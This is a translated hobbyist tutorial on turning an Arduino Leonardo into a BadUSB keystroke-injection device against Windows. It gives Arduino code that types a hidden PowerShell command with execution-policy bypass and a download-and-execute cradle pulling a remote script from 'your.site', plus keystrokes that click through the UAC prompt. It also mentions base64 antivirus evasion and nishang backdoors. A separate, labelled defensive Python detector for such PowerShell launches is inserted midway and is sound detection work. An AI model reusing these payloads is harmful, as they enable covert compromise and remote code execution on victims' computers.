*This article is originally written by: ya0guang. It is part of the FreeBuf original reward program, and reproduction without permission is prohibited.
Introduction
Hardware security is a subject most newcomers have had little exposure to, and it is very appealing, but the high prices of some professional security research equipment can be daunting. In this series, the author hopes to show interested readers the charm of hardware security at low cost.
This series is planned to be divided into four parts: BadUSB on Arduino; RFID on PN532; GSM on Motorola C118; SDR on RTL2832U (TV stick).
Background
BadUSB was presented at the PacSec conference at the end of 2014. It is a weakness in the USB protocol itself: a USB device can present itself as any other kind of device, such as an input device or a network card.
The vulnerability has still not been fixed, and it is fair to say that with the right script, as long as the device can be plugged in, nothing is safe from being compromised!
The 2014 slides are here:
https://srlabs.de/wp-content/uploads/2014/11/SRLabs-BadUSB-Pacsec-v2.pdf
Introduction to Common Hardware
Psychson
In fact, this is an open-source project on GitHub. Because the controller chips in some USB drives on the market can be reprogrammed, it achieves BadUSB functionality in a truly geeky way. However, the project has not been updated for two years, and much of the supported hardware has been discontinued or switched to new controller chips. The author also tried it and failed.
Disguise ability: ★★★★★
Ease of development: ★★
Community support: ★★
Project homepage:
https://github.com/brandonlw/Psychson
Rubber Ducky
Its Chinese name translates as "Rubber Duck". It looks like an ordinary USB drive but hides a modified chip. Its structure is shown in the picture; notable features are that it is detachable and uses an SD card, which makes payload replacement easy and the disguise excellent!
As a result, the protagonist of the American drama "Mr. Robot" successfully used this device to draw the attention of a police officer (and hack him). However, the Rubber Ducky from Hak5 costs $45, which is simply unaffordable for the author! Moreover, it does not ship to China! Still, the scripts in its project are well worth referring to and learning from!
Disguise ability: ★★★★
Ease of development: ★★★☆
Community support: ★★★★
Hak5 official payloads:
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
Teensy USB
A USB microcontroller development board that can act as a keyboard or mouse! Some models also have a slot for a storage card, and the overall price is about half that of the Rubber Ducky, but it is still a bit expensive for us!
Disguise ability: ★★
Ease of development: ★★★
Community support: ★★★
Arduino Leonardo
This is today's main character. Priced between 20 and 40 RMB, it is the first choice for budget hackers (like me)! Moreover, Arduino programming is quite beginner-friendly. The author's board is shown in the picture:
First, set up the Arduino IDE by changing the "serial port" and "board" options:
Next, we start writing the payload. The payload is really just a series of commands typed through the keyboard to achieve some goal, such as planting a backdoor or opening a reverse shell. Keep this in mind while writing the program.
Startup Method
The basic structure of the program is as follows:
#include <Keyboard.h>

void setup() {
  // Payload
}

void loop() {
  // none
}
It uses the Keyboard library, which defines the key constants; for keys that cannot be typed as plain characters, look up the defined names in the library header, which is on GitHub: https://github.com/arduino-libraries/Keyboard/blob/master/src/Keyboard.h
Of these, only setup matters to us: it is the part that runs as soon as the board is powered on, i.e., when it is plugged in. loop is left empty.
The author uses Windows, and only Windows is discussed here. The classic way to launch a script or program from the keyboard on Windows is Win+R, the Run dialog. On Windows 8 and above, pressing Win+S, typing powershell or cmd, and pressing Enter also gets you a console to type commands into.
The code is as follows. An annoying detail is that an active Chinese input method largely defeats a BadUSB attack, but in our script we can use some default shortcuts to switch to the English input method. Also, Windows commands are not case-sensitive, so in some cases simply pressing Caps Lock is enough.
delay(1000);
Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');
Keyboard.releaseAll();
delay(500);
// For shift+ctrl to switch input method
Keyboard.press(KEY_LEFT_SHIFT);
Keyboard.press(KEY_LEFT_CTRL);
// For win8 and above to switch to Chinese input
Keyboard.press(KEY_LEFT_GUI);
Keyboard.println(' ');
// Some input methods switch between Chinese and English
Keyboard.press(KEY_LEFT_SHIFT);
// Directly switch to English
Keyboard.press(KEY_CAPS_LOCK);
// Manually release keys
Keyboard.releaseAll();
Various Powershell Techniques
Since the Run dialog is now open, the next step is to execute the code. Here we need some advanced techniques for starting PowerShell.
Startup Options
Entering "powershell -?" in cmd or PowerShell lists all the startup options; here we focus mainly on two: ExecutionPolicy and WindowStyle. PowerShell's default ExecutionPolicy is RemoteSigned.
This means downloaded scripts must carry a trusted signature; in other words, user-written scripts cannot be executed. So we need to set this option to Unrestricted or Bypass. Setting WindowStyle to Hidden hides the window while the command runs, which helps a lot with stealth.
For example, we can enter in the run dialog:
powershell -executionpolicy bypass -windowstyle hidden ping www.baidu.com > d:\test.txt
The content of test.txt is as follows:
Pinging www.a.shifen.com [119.75.218.70] with 32 bytes of data:
Reply from 119.75.218.70: bytes=32 time=23ms TTL=53
Reply from 119.75.218.70: bytes=32 time=23ms TTL=53
Reply from 119.75.218.70: bytes=32 time=24ms TTL=53
Reply from 119.75.218.70: bytes=32 time=23ms TTL=53

Ping statistics for 119.75.218.70:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milliseconds:
    Minimum = 23ms, Maximum = 24ms, Average = 23ms
In addition, commands can be passed directly as base64, which can get past antivirus software. This is an even more powerful execution technique.
Remote Execution
In fact, the point of the bypass is to execute scripts from a remote server. Here is an example:
powershell -ExecutionPolicy Bypass IEX (New-Object Net.WebClient).DownloadString('http://your.site/file.ps1');
This shows the power of PowerShell, which can create .NET objects directly. The line above downloads a remote script and executes it. Obviously a remote script is more elegant and flexible than cramming the payload into one line. The most important reason, though, is that this Arduino board has too little storage to hold a long script.
Here I recommend a PowerShell penetration-testing framework: nishang
Project address: https://github.com/samratashok/nishang
The power of nishang lies in its ability to do almost everything a backdoor can do.
As far as I know, Metasploit also supports generating PowerShell payloads now.
Publicly available PowerShell scripts can be served temporarily and discreetly through GitHub's raw file service, an online paste service, or even a web server exposed with ngrok.
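The defender's view of the "Startup Options" and "Remote Execution" sections above is that every trick they rely on leaves a trace in the PowerShell command line recorded by process-creation auditing (Security event 4688 with command-line logging, or Sysmon event 1). The script below is an added example and is not from the article: it scores launch arguments for the patterns discussed here (-ExecutionPolicy Bypass, -WindowStyle Hidden, a base64 -EncodedCommand, and the IEX + DownloadString cradle) and decodes any -EncodedCommand value so an analyst can read it. The log records, field names and threshold are constructed for the example, not real telemetry.

```python
"""Flag suspicious PowerShell launches in process-creation telemetry (added example)."""
import base64
import re

# PowerShell accepts any unambiguous prefix of a parameter name, so the patterns
# also catch short forms such as -ep, -exec, -w, -win, -e, -enc and -nop.
ENCODED_RE = re.compile(r"-e(?:n\w*|c)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# Each rule: (name, compiled pattern, weight). Weights are an assumption for this
# example; tune them against your own baseline.
RULES = [
    ("execution_policy_bypass", re.compile(r"-e[px]\w*\s+(?:bypass|unrestricted)", re.I), 2),
    ("hidden_window",           re.compile(r"-w\w*\s+hidden", re.I), 2),
    ("encoded_command",         ENCODED_RE, 2),
    ("invoke_expression",       re.compile(r"\bIEX\b|Invoke-Expression", re.I), 1),
    ("web_download",            re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I), 2),
    ("no_profile",              re.compile(r"-nop\w*", re.I), 1),
]
ALERT_THRESHOLD = 3
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")
PS_PATH = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"


def _utf16_b64(text):
    """Build a -EncodedCommand value for the constructed sample below (PowerShell
    expects base64 of UTF-16LE text)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample records, loosely modelled on 4688 / Sysmon event 1 fields.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "explorer.exe", "image": PS_PATH,
     "cmdline": "powershell -executionpolicy bypass -windowstyle hidden ping www.baidu.com > d:\\test.txt"},
    {"pid": 4188, "parent": "explorer.exe", "image": PS_PATH,
     "cmdline": "powershell -ExecutionPolicy Bypass IEX (New-Object Net.WebClient)"
                ".DownloadString('http://your.site/file.ps1');"},
    {"pid": 4201, "parent": "explorer.exe", "image": PS_PATH,
     "cmdline": "powershell -nop -w hidden -enc " + _utf16_b64("IEX (New-Object Net.WebClient)")},
    {"pid": 4302, "parent": "svchost.exe", "image": PS_PATH,
     "cmdline": "powershell -File C:\\Scripts\\backup.ps1"},
    {"pid": 4400, "parent": "explorer.exe", "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe"},
]


def is_powershell(event):
    """True when the launched image is a PowerShell host."""
    return event.get("image", "").lower().endswith(POWERSHELL_IMAGES)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand text, or None if absent or malformed."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(event):
    """Return (score, [matched rule names]) for one process-creation record."""
    if not is_powershell(event):
        return 0, []
    cmdline = event.get("cmdline", "")
    hits = [name for name, pattern, _ in RULES if pattern.search(cmdline)]
    score = sum(weight for name, _, weight in RULES if name in hits)
    return score, hits


def find_alerts(events, threshold=ALERT_THRESHOLD):
    """Return one alert dict per event whose score reaches the threshold."""
    alerts = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            alerts.append({"pid": ev["pid"], "parent": ev["parent"], "score": score,
                           "rules": hits, "decoded": decode_encoded_command(ev["cmdline"])})
    return alerts


if __name__ == "__main__":
    for alert in find_alerts(SAMPLE_EVENTS):
        print(alert)
```

The legitimate backup script (pid 4302) scores zero, while the three launches that mirror the article's command lines all exceed the threshold; the last alert also carries the decoded cradle text. In practice the parent-process field is the other signal worth correlating: a PowerShell host spawned from explorer.exe seconds after a new HID device enumerates is exactly the footprint a keystroke-injection device leaves.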
Bypass UAC
The code that follows is shown below; the latter part handles UAC, i.e., the pop-up user confirmation dialog.
// Launch PowerShell from the Run dialog
Keyboard.println("powershell -ExecutionPolicy Bypass IEX (New-Object Net.WebClient).DownloadString('http://your.site/file.ps1');");
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_SHIFT);
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
delay(500);
// Handle the UAC confirmation dialog
Keyboard.press(KEY_RETURN);
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.press(KEY_RETURN);
delay(500);
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
delay(2500);
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
Keyboard.press(KEY_LEFT_ALT);
Keyboard.println('y');
Keyboard.releaseAll();
Keyboard.press(KEY_RETURN);
Keyboard.releaseAll();
delay(1500);
Conclusion
Combining PowerShell with BadUSB can accomplish a great deal on Windows. BadUSB attacks are not limited to keyboard input: mouse input and even network cards can serve as attack tools. The author has seen a mobile phone act as a network card to sniff traffic in Kali NetHunter.
Although two years have passed since the vulnerability was disclosed, it will remain common across operating systems and USB stacks in the near future. More advanced techniques remain to be explored!